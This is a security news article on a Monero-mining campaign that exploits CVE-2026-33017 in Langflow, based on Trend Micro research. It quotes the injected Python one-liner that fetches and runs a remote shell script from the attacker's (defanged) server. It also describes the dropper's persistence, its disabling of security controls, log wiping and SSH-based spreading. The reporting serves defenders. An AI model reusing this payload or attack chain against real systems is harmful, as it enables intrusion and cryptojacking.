CVE-2026-33017: Exploitation Details Reveal Monero Miner Campaign Targeting Exposed Langflow AI Instances
Trend Micro researchers detail a cryptomining campaign exploiting CVE-2026-33017, an unauthenticated RCE vulnerability in the Langflow AI workflow tool, exposing the pivot from targeting traditional infrastructure to AI application endpoints.
A new campaign is actively exploiting CVE-2026-33017, a critical vulnerability in the open-source Langflow AI workflow tool, to deploy a Monero cryptocurrency miner on exposed instances. Researchers at Trend Micro have published a full technical analysis of the attack chain, revealing how a single unauthenticated POST request can lead to the complete compromise of a system running AI application infrastructure. The campaign underscores a growing trend: commodity cryptominer operators are pivoting from traditional targets like Docker APIs and SSH to AI pipeline tools that are often deployed with default credentials or missing authentication.
The initial access vector is an unauthenticated POST to Langflow's /api/v1/build_public_tmp/{flow_id}/flow endpoint. By default, Langflow ships with AUTO_LOGIN enabled, granting any unauthenticated visitor a superuser token and the ability to create a public flow on demand. Attackers exploit this by sending a JSON payload containing a single line of Python code: __import__('os').system('curl hxxp[://]83[.]142[.]209[.]214:8080/isp.sh | sh'). This one-liner fetches and executes a shell script from a remote server, effectively granting full remote code execution on the Langflow instance.
The dropper, a bash script named isp.sh, checks if a binary called lambsys is already running. If not, it creates a hidden persistence directory at /var/tmp/.xlamb/, downloads the lambsys binary via curl or wget, and launches it. The script then spreads to every SSH-reachable host by enumerating key files and agent sockets, demonstrating a worm-like propagation mechanism. The lambsys binary is an ELF executable written in Go and UPX-packed. Before engaging in mining operations, it runs a strict setup sequence designed to eliminate competition and disable security controls.
lambsys first raises the ulimit to sustain enough sockets for mining pool connections. It then runs pkill commands against a list of rival cryptominers, mining pools, and process-hiding techniques. It kills processes on 13 common mining ports and terminates anything referenced by hidden PID files under /tmp/.X11-unix/ and /tmp/.systemd.*. The binary also deletes the akay and vfinder accounts and backdoor logins from earlier Linux miner campaigns, disables AppArmor, UFW, iptables, SELinux, the kernel NMI watchdog, and the Alibaba Cloud Aliyun agent. It strips chattr +i locks on cron, /tmp, and SSH infrastructure, and deletes /var/log/syslog to cover its tracks.
To maintain persistence, lambsys plants two watchdogs: a cron job that runs every five minutes, and a bash loop (init_rmount) that runs every 60 seconds. Both are capable of re-pulling the binary from the command-and-control (C&C) server and then locking /tmp and /var/tmp with chattr +iua to prevent tampering. The beacon mechanism involves a JSON heartbeat POSTed to 83[.]142[.]209[.]214:80/status.php every ~128 seconds. Separately, it pulls a file named ks.tar, verifies it with MD5, and extracts a customized XMRig miner (procq) into a hidden triple-dot-space directory. The miner connects to a mining pool on TCP/3333.
This is the second time in a year that Langflow has shipped this class of vulnerability. The first, CVE-2025-3248, was exploited in June 2025 by the Flodrix DDoS botnet operators using essentially the same primitive. The current campaign shifts the payload from Flodrix to a cryptocurrency miner, but the exploit surface remains identical. Trend Micro's analysis covers 19 days of observed exploitation activity, emphasizing that the delivery vector is the only thing that has moved. The payloads behind the door have existed, in some cases with the same filename and install path, since at least May 2024.
The attack highlights a broader pattern: as organizations rapidly deploy AI application infrastructure, security configurations often lag behind. Langflow is not the first AI application framework to become a commodity-miner delivery vector, and researchers note it will not be the last. Organizations running Langflow instances are urged to ensure instances are not exposed to the public internet, enable authentication, and apply the patch released on March 13, 2026. The CVE-2026-33017 vulnerability serves as a stark reminder that AI pipelines, once considered internal tools, are now front-line targets in the evolving threat landscape.